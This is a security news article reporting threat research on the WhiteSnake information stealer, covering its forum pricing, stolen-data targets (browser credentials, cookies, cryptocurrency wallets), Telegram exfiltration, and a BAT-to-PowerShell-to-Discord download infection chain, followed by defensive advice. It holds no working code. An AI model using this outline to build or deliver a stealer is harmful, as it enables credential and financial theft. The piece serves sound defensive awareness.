The Cyble Research and Intelligence Labs (CRIL) have recently discovered a new type of malware named the “WhiteSnake” Stealer. This malicious software has the potential to cause substantial damage to computer systems by stealing sensitive information.
In the early part of this month, the WhiteSnake Stealer was detected on cybercrime forums for the first time. Furthermore, it is available in versions specifically designed for both major operating systems.
The WhiteSnake Stealer is a serious threat that could compromise sensitive information on both Windows and Linux operating systems. It is concerning that the malware has already been identified on cybercrime forums, which suggests that it is actively being used by cybercriminals.
To protect against this threat, it is essential to ensure that all software and operating systems are kept up to date with the latest security patches. Additionally, users should be cautious when opening emails or downloading attachments from unknown sources, as this is a common method for delivering malware.
It is also recommended to have robust antivirus and anti-malware software installed on all systems and to conduct regular security audits to identify and address vulnerabilities. Finally, it is crucial to educate users on safe online practices and to remain vigilant in monitoring for any suspicious activity.
Capabilities of WhiteSnake Stealer
In terms of sensitive information, it has the capability to gather a range of data, including:-
- Passwords
- Cookies
- Credit card numbers
- Debit card number
- Taking Screenshots
- Other personal data
- Other financial data
A Telegram bot is used by the Stealer to send the stolen files as soon as they have been collected and compressed. Since this info stealer is still in its development phase, so, it is updated by the cyber criminals on a daily basis.
Pricing of Malware
Below is a list of the prices for WhiteSnake Stealer with their respective validity:-
- 120$ / 1 month
- 300$/ 3 months
- 500$ / 6 months
- 900$ / 1 year
- 1500$ / Lifetime
WhiteSnake Stealer Capabilities
A screenshot of an advertisement was recently shared by cybercriminals, which revealed that the WhiteSnake Stealer is now available for Linux operating systems. What is interesting is that the Linux version provides the same range of features and capabilities as the Windows version.
The binary for the Linux stealer is relatively small, with a file size of just 5KB, and it can be compiled utilizing extensions like:-
- .py
- .sh
At the beginning of the infectious rampage, a sneaky spam email, cunningly disguised as a harmless PDF document, delivers the nefarious payload in the form of an executable file.
With help of the “Bat2Exe” converter, a BAT is transformed into an executable file format. In the %temp% folder a BAT file is dropped (“tmp46D2.tmp.bat”) by the executable file when it is run by the user.
Upon execution of the BAT file, a PowerShell script is initiated, which subsequently downloads a secondary BAT file named “build.bat” from a designated URL on the Discord platform.
There are traditional Chinese characters displayed in a text editor when the file “build.bat” is opened. There is an executable Binary encoded in Base64 that has been included between digital certificates within the decoded BAT file.
A binary executable file named “build.exe” is then created from the decoded output, and it is saved to the %temp% folder as a binary executable file.
The WhiteSnake Stealer is a .NET executable binary that is based on a 32-bit GUI and it’s disguised under “build.exe” payload.
The initiation of “build.exe” results in the creation of a unique mutex dubbed “kwnmsgyyay,” which functions to limit the execution of the malware to a single instance at a time on the targeted system.
Upon the establishment of the aforementioned mutex, the malware executes the AntiVM() function, which is crafted with the intent of preventing the execution of malware within a virtualized environment.
Browsers and Cryptocurrency Wallets Affected
From several popular web browsers, this malware is capable of stealing “Cookies”, “Autofills”, “Login Data”, and “Web Data”:-
- Mozilla Firefox
- Google Chrome
- Brave-Browser
- Chromium
- Microsoft Edge
Apart from the web browsers, the malware is also capable of stealing important files from a number of cryptocurrency wallets, including:-
- Atomic
- Guarda
- Coinomi
- Bitcoin
- Electrum
- Exodus
The WhiteSnake Stealer exhibits a range of sophisticated functionalities, including the ability to gain unauthorized access to cryptocurrency wallets via designated directories, as well as the capacity to extract sensitive information from browser extensions associated with such wallets.
Recommendations
To maintain cybersecurity, avoid downloading pirated software from warez or torrent websites. Create strong and unique passwords, and always enable multi-factor authentication. Avoid using any user passwords, and ensure that the automatic software update feature is turned on. It is highly recommended to use reputable anti-virus software, and never open links or attachments from untrusted emails. Blocking URLs that could spread malware is also advisable. At the network level, monitor the beacon to ensure security.
Go to Source
Author: Guru
